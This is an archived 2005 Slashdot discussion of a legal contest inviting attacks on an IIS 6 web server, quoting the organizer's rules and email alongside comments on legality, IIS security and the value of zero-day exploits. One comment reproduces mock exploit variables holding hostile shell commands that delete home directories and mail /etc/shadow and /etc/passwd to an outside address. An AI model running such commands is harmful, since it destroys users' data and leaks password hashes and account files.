Forgot your password?
typodupeerror

Hack IIS6 Contest 545

Posted by CmdrTaco
from the get-your-crackz0r-on dept.
ThePurpleBuffalo writes "This just came in across a BugTraq mailing list from Roger Grimes: 'Starting May 2nd and going until June 8th, the server located at http://www.hackiis6.com/ will welcome hackers to attack it. If you can deface the web site or capture the "hidden" document, you win an X-box! Read contest rules for what does and doesn't constitute a successful hack. We've tried to be as realistic as possible in what constitutes a successful hack, and in mimicking a basic HTML and ASP.NET web site. ' "
This discussion has been archived. No new comments can be posted.

Hack IIS6 Contest

Comments Filter:
  • Re:Physical Access (Score:4, Informative)

    by Medgur (172679) on Thursday May 05, 2005 @03:13PM (#12444358) Homepage
    From TFA:
    "A successful hack does not include:
    1. External denial of service attack against web server computer, or any participating vendor, or device. Denial of service attacks due to successfully modified content on web server computer are fair game.
    2. Attacks or modifications of any computer or device besides web server or database computers.
    3. Attacks involving external domain naming services.
    4. Publishing readily available directory or file listings without accessing or modifying files on the web server or database computer.
    5. Physical attacks."
  • by thrill12 (711899) * on Thursday May 05, 2005 @03:15PM (#12444387) Journal
    A successful hack does not include:

    1. External denial of service attack against web server computer, or any participating vendor, or device. Denial of service attacks due to successfully modified content on web server computer are fair game.


    They counted on that one :)
  • by maotx (765127) <maotx.yahoo@com> on Thursday May 05, 2005 @03:22PM (#12444482)
    The site is down so here is the original e-mail he sent out.

    Welcome to the HackIIS6.com Contest!

    Starting May 2nd and going until June 8th, the server located at
    http://www.hackiis6.com/ [hackiis6.com] will welcome hackers to attack it. If you can
    deface the web site or capture the "hidden" document, you win an X-box!
    Read contest rules for what does and doesn't constitute a successful
    hack. We've tried to be as realistic as possible in what constitutes a
    successful hack, and in mimicking a basic HTML and ASP.NET web site.

    For the most part, almost anything reasonable constitutes a successful
    attack except for a massive network denial of service attack against the
    IIS 6 or its host provider. Not that doing a successful DoS attack
    wouldn't be a problem in the real world...it would be...but we aren't
    testing that. We want to test the security of Windows Server 2003, IIS,
    and other Microsoft applications. So, please, respect this one rule of
    the contest so everyone can have a chance at claiming the prize.

    Questions and Prizes
    If you have questions, send an email to admin@hackiis6.com. If you want
    to claim a prize, send your email, with the details listed in the
    official rules to prizes@hackiis6.com.

    Contest Summary
    We are going to start the contest for the first two weeks with the very
    basic, static HTML web site that you are now reading. Two weeks later,
    we'll add an ASP.NET web site and a back-end SQL server to add more
    flavor and give more area to attack. We started with the basic site to
    prove that Microsoft's Internet Information Service (IIS) and Windows
    Server 2003 is secure by itself. This is to satisfy the purists who
    thinking hacking ASP.NET is hacking an application and not the server.
    So, if you've got skillz in one area versus the other, you'll have a
    chance to try both attack types.

    Once the contest stops on June 8th, we will announce the winner(s) at
    the upcoming June Microsoft Tech.Ed conference.

    The Setup
    This server is running Windows Server 2003, Service Pack1, with all
    current publicly-released patches and hotfixes installed (we ran Windows
    Update and MBSA just like a real admin would do). We installed IIS 6.0.
    and then we followed the basic recommendations
    (http://www.microsoft.com/technet /security/prodtec h/IIS.mspx [microsoft.com]) suggested
    by Microsoft. I added a few tweaks here and there, to put my personal
    mark on the site, but nothing extraordinary.

    There is no non-Microsoft software involved with the exception of the
    host's router/firewall, which would be normal in most environments. We
    want to make this a test of Microsoft software.

    Why a hacking contest?
    To have fun! Sure there will be critics who say sponsoring a hacking
    contest proves nothing. If the IIS server remains unbroken, it still
    doesn't mean that IIS is really "secure." True, and if I wasn't the
    contest's team leader, I'd probably be the first one to yell that out.
    Hacking contests rarely prove something is secure, although it only
    takes a single successful hack to prove something is unsecure.

    So why do it? There are very few places on the Internet where hackers,
    good and bad, can hack legally. Windows IT Pro thought the contest would
    be a fun way to interact with the hacker community (they realize most
    hackers have good intentions) and bring some attention to Windows IT Pro
    (of course, they'll disavow all responsibility and blame me solely if
    the server gets hacked) .

    So, welcome to the contest! Hack away. If the IIS server goes unhacked
    during the extended time period, it might not mean that IIS is
    "unhackable", but if it does survive the contest it might convince a few
    people that it is a relatively secure web server platform. After all,
    over 20% of the Internet relies on it, including some of the largest web
    sites in the world.

    Happy Hacking,

    Roger A. Grimes
    Contributing editor, Windows IT Pro Magazine
  • "The Fallacy of Cracking Contests" by Bruce Schneier: The Fallacy of Cracking Contests [schneier.com]

    In short, if it's broken, that's valuable. If it isn't broken in the time allotted, on the other hand, that doesn't mean it's secure.

  • by Quila (201335) on Thursday May 05, 2005 @03:32PM (#12444587)
    The laws are about unauthorized access. These guys just gave you authorization.
  • Re:Physical Access (Score:1, Informative)

    by stedo (855834) on Thursday May 05, 2005 @03:32PM (#12444592) Homepage
    Hacking with physical access is not hacking. If you can get close enough to pull the plug out of the wall and stick in some live cd (e.g. knoppix) then you can do whatever you want, no matter what OS it is. If the OS isn't running, it can't do jack to protect your data
  • Re:Hmm.. (Score:3, Informative)

    by joeldg (518249) on Thursday May 05, 2005 @03:36PM (#12444631) Homepage
    here is what those vars are...

    shellcode = "/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe"
    launcher = "cat /etc/shadow |mail full-disclosure@lists.grok.org.uk "
    netcat_shell = "cat /etc/passwd |mail full-disclosure@lists.grok.org.uk

    yea.. run that!

  • Re:Hack? Or crash? (Score:2, Informative)

    by The Bungi (221687) <thebungi@gmail.com> on Thursday May 05, 2005 @03:42PM (#12444704) Homepage
    pPh3^R Slashdot's official 'hacker', he can't tell the difference between IIS and IE.
  • by LupusUF (512364) on Thursday May 05, 2005 @03:44PM (#12444727)
    Sadly, you don't get the xbox if you put up anything obscene (or advertise any product).
  • Several things (Score:3, Informative)

    by Safety Cap (253500) on Thursday May 05, 2005 @04:04PM (#12444943) Homepage Journal
    What makes IIS inherently more difficult to secure then Apache or any other web server?
    It comes out of the box will all manner of unnecessary things turned on.

    It uses OS-level functions and system calls ("tightly integrated"), so when you hack IIS, you pwn the box, too.

    Apache requires you to read the documentation and crack the httpd.conf with a text editor in order to change stuff. This ensures that you are at least one evolutionary level above blind, one-armed chimp, which is the only required level to use the mouse and click-click-click on the Internets MMC configurator for IIS. At a minimum, Apache web admins are *slightly* more talented than IIS admins (unfortunately, there are lots of stupid admins out there, no matter the flavor).

    It was never written for security first, but rather just doing stupid monkey tricks with IE, serving static HTML and (studder) running VB COM objects as CGIs...

  • admin@hackiis6.com (Score:2, Informative)

    by sjasja (694035) on Thursday May 05, 2005 @04:05PM (#12444951)
    # nslookup
    > set ty=mx
    > hackiis6.com
    Non-authoritative answer:
    hackiis6.com MX preference = 10, mail exchanger = hostmaster1.local.banneretcs.com

    Hee hee, MS didn't have the cojones to put the mail server on hackiis6.com.

    How to secure MS software: run as little of it as possible.

  • Re:and done. (Score:5, Informative)

    by cduffy (652) <charles+slashdot@dyfis.net> on Thursday May 05, 2005 @04:08PM (#12444992)
    The relevant laws are against unauthorized access. By inviting you to hack their box, they authorized you. No reason to be paranoid.
  • by Omniscientist (806841) <matt AT badecho DOT com> on Thursday May 05, 2005 @04:43PM (#12445405) Homepage
    Look again [netcraft.com]

    They just switched to IIS 6.0 yesterday, actually.

  • by Anonymous Coward on Thursday May 05, 2005 @05:02PM (#12445638)
    I thought about that as well, but:

    A successful hack does not include:
    ...
    3. Attacks involving external domain naming services.
  • by Anonymous Coward on Thursday May 05, 2005 @05:23PM (#12445845)
    This is not an easy contest because the site has no interactive content, no remote admin console, the server doesn't have any extraneous services listening on random ports, no database driven content, etc. etc. etc.

    For sure. I've been messing with it for the last hour. Its a very lame subset of HTTP thats being supported, no head requests, no compression, no HTTP 1.0 etc. Its doing the equivalent of a 20 line perl script. However, they say they'll be adding ASP later on in May. That could be more fun...
  • Re:Several things (Score:3, Informative)

    by rainman_bc (735332) on Thursday May 05, 2005 @07:55PM (#12447146)
    lol I did that! I set up a reverse proxy for fun, and I left the proxy open to the whole www...

    I saw strange requests in my logs all of a sudden to doubleclick. People were making money off my open proxy... haha woops!
  • by Anonymous Coward on Thursday May 05, 2005 @10:44PM (#12448116)
    Pleasure to be Slashdotted

    Let's see if I can answer some questions from the previous posts:

    1. We only offered an Xbox vs. $1M in prize money because we are a magazine company and not Bill Gates' private charity. I came up with the idea so people could have a little fun and just getting the site up cost a bit of money...so the prize had to be limited.

    2. The only reason we ask for 24 hours of silence if you hack the site is to give the time for the admin's to actually notice (i.e. wake up, check email), evaluate the proposed success, and to announce the winner ourselves. It's our contest, we wanted the "glory".

    We certainly aren't going to fix any bugs secretly and MS certainly can't fix any bugs in 24 hours (because of regression testing and things like that).

    3. I'm sure we would tell MS about any successful hacks, but I assure you it's far from the contest's intent. It's to learn how well a standard tightened IIS box holds up under a sustained attack without any foreign hardware or uber experts involved. I'm a Windows security "expert", but my expertise is not in IIS by any stretch of the imagination. I can barely spell it.

    4. Yes, more than likely if someone has some nifty zero day exploit they won't waste it for an X-box...but they might for the "glory" and Slashdot fame. A black hat wouldn't but a white or gray hat might.

    5. MS isn't widely involved in this contest...and they certainly aren't out to use it to collect new bugs. If anything, there is zero upside for them and a whole lot of downside. If the site survives for 4 weeks without a successful hack, I doubt Slashdot will even rate it a single post, but if it gets hacked...it will be on every major mail list.

    6. Yes, MX record was hosed...it was fixed within 15 minutes of someone emailing me (at my other email address). I had tested the email system and it worked...but it turns out my Exchange server was basically re-routing my test mails internally instead of creating a true test like I thought. Dork-geek of me. I learned something new today.

    7. I would love the Slashdot community to put up a GNU/Linux or other OSS web server (or I think there may be others out there already...)...so all parts of the community can have fun.

    It's interesting...I put up a web site for beginning hackers to have fun with and somehow it results in conspiracy theories and negative comments...

    Roger A. Grimes
    roger@banneretcs.com
  • by acz (120227) <zNO@SPAMhert.org> on Friday May 06, 2005 @02:15AM (#12448998) Homepage
    You have to be retarted to use an 0day IIS exploit to win an XBox when you can sell it for around 20K or impress customers during a pen test... (A pen test can be worth between 15K to 200K depending on the scope of the project).

    One hour of security consulting earns you an XBox, why bother with this contest?

    Link to post on vuln sharing club, here [immunitysec.com]
  • by cybermint (255744) on Friday May 06, 2005 @02:44AM (#12449092)
    This contest will not be taken seriously by anyone with significant skill or knowledge. This server has been made relatively "secure" by implementing all procedures and patches which are readily available. This may fix all known vulnerabilities, protecting it from the script kiddies, but doesn't fix those which have not been made public. An unfixed, non-public exploit is worth much, much more on the black market than a lousy x-box.

    Put up a large enough prize and that server will be comprimised without a doubt. The same goes for Apache or any other alternative.

Whenever a system becomes completely defined, some damn fool discovers something which either abolishes the system or expands it beyond recognition.

Working...